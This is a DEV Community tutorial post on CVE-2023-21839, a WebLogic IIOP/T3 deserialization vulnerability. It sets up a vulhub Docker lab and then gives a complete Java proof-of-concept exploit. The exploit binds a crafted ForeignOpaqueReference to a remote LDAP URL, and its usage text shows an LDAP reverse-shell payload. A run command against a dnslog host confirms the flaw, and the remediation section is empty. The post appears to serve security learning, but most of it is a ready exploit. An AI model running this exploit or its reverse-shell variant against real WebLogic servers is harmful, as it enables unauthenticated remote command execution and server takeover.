DEV Community

Cover image for WebLogic Deserialization Vulnerability - CVE-2023-21839
TutorialBoy
TutorialBoy

Posted on

WebLogic Deserialization Vulnerability - CVE-2023-21839

Introduction

WebLogic is an application server produced by Oracle Corporation in the United States. To be precise, it is a middleware based on JAVAEE architecture. WebLogic is a Java application server for developing, integrating, deploying, and managing large-scale distributed Web applications, network applications and database applications.

Vulnerability Overview

CVE-2023-21839

Due to flaws in the Weblogic IIOP/T3 protocol, when the IIOP/T3 protocol is enabled, unauthenticated attackers are allowed to attack WebLogic Server with security risks through the IIOP/T3 protocol network access. A successful WebLogic Server may be taken over by an attacker to execute arbitrary commands, resulting in a server crash or severe sensitive data leakage.

Affect Versions

  • Weblogic 12.2.1.3.0
  • Weblogic 12.2.1.4.0
  • Weblogic 14.1.1.0.0

Environment

You can use vulhub to build a vulnerability environment:

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839

clone project:

git clone https://github.com/vulhub/vulhub.git
Enter fullscreen mode Exit fullscreen mode

In the /WebLogic/CVE-2023-21839/ directory, use the following command to download and start the 12.2.1.3 version of WebLogic:

docker-compose up -d
Enter fullscreen mode Exit fullscreen mode

Then visit http://your-ip:7001/console, you can see the login page

Image description

Vulnerability Reappearance

You can use the DXask88MA master's tool:

weblogic.deployment.jms.ForeignOpaqueReference.class

Enter fullscreen mode Exit fullscreen mode

You can also choose to use the 4ra1n master tool to simulate data packets with go:

weblogic.jndi.internal.ForeignOpaqueReference.class
POC:

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;

public class CVE_2023_21839 {
    static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";
    static String HOW_TO_USE="[*]java -jar Target ip:port ldap address\n e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";

    private static InitialContext getInitialContext(String url)throws NamingException
    {
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }
    public static void main(String args[]) throws Exception {
        if(args.length <2){
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        InitialContext c=getInitialContext("t3://"+t3Url);
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
        weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f,env);
        Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f,ldapUrl);
        String bindName = new Random(System.currentTimeMillis()).nextLong()+"";
        try{
            c.bind(bindName,f);
            c.lookup(bindName);
        }catch(Exception e){ }

    }
}
Enter fullscreen mode Exit fullscreen mode

Use dnslog directly to test and download the Jar file:

Executing an order:

java -jar Weblogic-CVE-2023-21839.jar 127.0.0.1:7001 ldap://81c95c8f.dns.1433.eu.org/test

Enter fullscreen mode Exit fullscreen mode

Check the dnslog, the request is received, and the vulnerability verification is successful

Image description

Remediation

Reference link:

Top comments (0)